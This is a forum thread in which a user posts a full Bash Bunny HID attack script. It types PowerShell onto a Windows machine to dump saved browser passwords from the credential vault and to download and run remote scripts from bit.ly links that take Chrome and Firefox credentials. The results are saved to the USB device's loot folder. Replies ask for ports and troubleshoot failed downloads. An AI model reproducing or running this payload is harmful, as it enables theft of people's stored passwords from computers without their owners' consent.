Jump to content
illwill

Violation of CoC

Recommended Posts

13 minutes ago, illwill said:

Was thinking of ways to dump browsercreds without the use Nirsoft programs, so screwing around with some powershell and some scripts i found that dump creds from Edge(IE)/Chrome/FireFox. I combined them into a HID attack that uses powershell to webdl the scripts into memory and execute and store the results \loot\BrowserCreds\%computername%.txt. 

Tested on Win10 with Delays that worked for my laptop , so may need adjusting, let me know of any errors you come across

https://raw.githubusercontent.com/xillwillx/BashBunny/master/BrowserCreds.txt


#!/bin/bash
#
# Title:         BrowserCreds
# Author:        illwill
# Version:       0.1
#
# Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
# then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire    Get-FoxDump.ps1

#script 
# Blue...............Running Script
# Purple.............Got Browser Creds


LED R 200
LOOTDIR=/root/udisk/loot/BrowserCreds
mkdir -p $LOOTDIR

ATTACKMODE HID STORAGE
LED B 200

# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100

#Dump Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \| 
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100

#Dump Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 2000


#Open 32bit powershell and Dump Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
LED R B 200
sync

 

Cool script @illwill but It's prefered to use

sync

before

LEDding

 

Share this post


Link to post
Share on other sites
12 minutes ago, henna3 said:

You have one for the usb rubber ducky aswell? 

Hehe

 

Here's what you're looking for :

 

 

Share this post


Link to post
Share on other sites

Hello, i have this problem : 

Get-ChromeCreds : Le terme «Get-ChromeCreds» n'est pas reconnu comme nom d'applet de commande, fonction, fichier de
script ou programme exécutable. Vérifiez l'orthographe du nom, ou si un chemin d'accès existe, vérifiez que le chemin
d'accès est correct et réessayez.
Au caractère Ligne:2 : 73
+ ... ent).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds | ft Us ...
+                                                   ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Get-ChromeCreds:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

So, i isolated the probleme :  this line :  "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds"

And its working perfectly.

But not with the script. Little translation, it says that Get-ChromeCreds is not a valid function, which i think means he failed to download. But idk why its working when i execute the line myself, and not when the script does it. Thx for help :)

 

Share this post


Link to post
Share on other sites

I think I'm having the same issue as the comment above, but I'm unsure how to fix it. Successfully continuing past the IEX string fails. The image below displays the problem.

Would be graterful for any help in finding a solution. Thanks, guys.

 

3R40ffg.png

Share this post


Link to post
Share on other sites

if you go to the github, dumpcreds 2.2 is in the pull request section and it works great for browser creds. :)

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...